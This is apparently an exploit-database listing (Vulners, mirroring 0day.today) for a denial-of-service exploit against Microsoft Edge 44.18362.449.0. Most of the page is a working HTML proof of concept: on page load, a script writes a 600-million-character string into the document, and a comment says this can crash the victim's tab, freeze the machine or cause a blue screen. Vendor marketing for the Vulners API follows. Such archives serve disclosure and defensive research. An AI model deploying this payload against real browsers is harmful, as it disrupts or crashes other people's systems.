Lucene search
K

Microsoft Edge 44.18362.449.0 - Denial Of Service Exploit

🗓️ 12 Nov 2019 00:00:00Reported by Abdelhamid NaceriType 
zdt
 zdt
🔗 0day.today👁 796 Views

Microsoft Edge Denial Of Service Exploit with different effect

Code
<html>

<head>
<!--Well there are multiple behavior of running this exploit on victim machine
1-Nothing happen
2-The current tab of ms-edge crash
3-The machine freeze and sometime even the kernel crash (a bsod appear)
4-sometime a black line appear
-->
<script>

function blah() {	
  var buff = '\x41';
  var buffer = buff.repeat(600000000);
  document.write(buffer);

}

</script>

</head>

<body onload=blah()>

</body>

</html>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation